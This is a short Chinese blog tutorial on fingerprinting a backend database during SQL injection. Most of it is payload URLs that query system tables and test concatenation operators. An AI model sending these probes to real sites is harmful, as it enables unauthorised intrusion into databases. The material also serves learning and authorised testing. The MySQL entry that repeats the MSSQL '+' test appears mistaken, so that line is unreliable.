微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

sql注入过程中后台数据库类型的三种判断方式

后台数据库类型判断:

一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,在此不多说;

二、通过各个数据库特有的数据表来判断:

    1、mssql数据库

      http://127.0.0.1/test.PHP?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access数据库

      http://127.0.0.1/test.PHP?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、mysql数据库(MysqL版本在5.0以上)

      http://127.0.0.1/test.PHP?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle数据库

      http://127.0.0.1/test.PHP?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通过各数据库特有的连接符判断数据库类型:

    1、mssql数据库

     http://127.0.0.1/test.PHP?id=1 and '1' + '1' = '11'

    2、MysqL数据库

     http://127.0.0.1/test.PHP?id=1 and '1' + '1' = '11'

     http://127.0.0.1/test.PHP?id=1 and CONCAT('1','1')='11'

    3、oracle数据库

     http://127.0.0.1/test.PHP?id=1 and '1'||'1'='11'

     http://127.0.0.1/test.PHP?id=1 and CONCAT('1','1')='11'

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐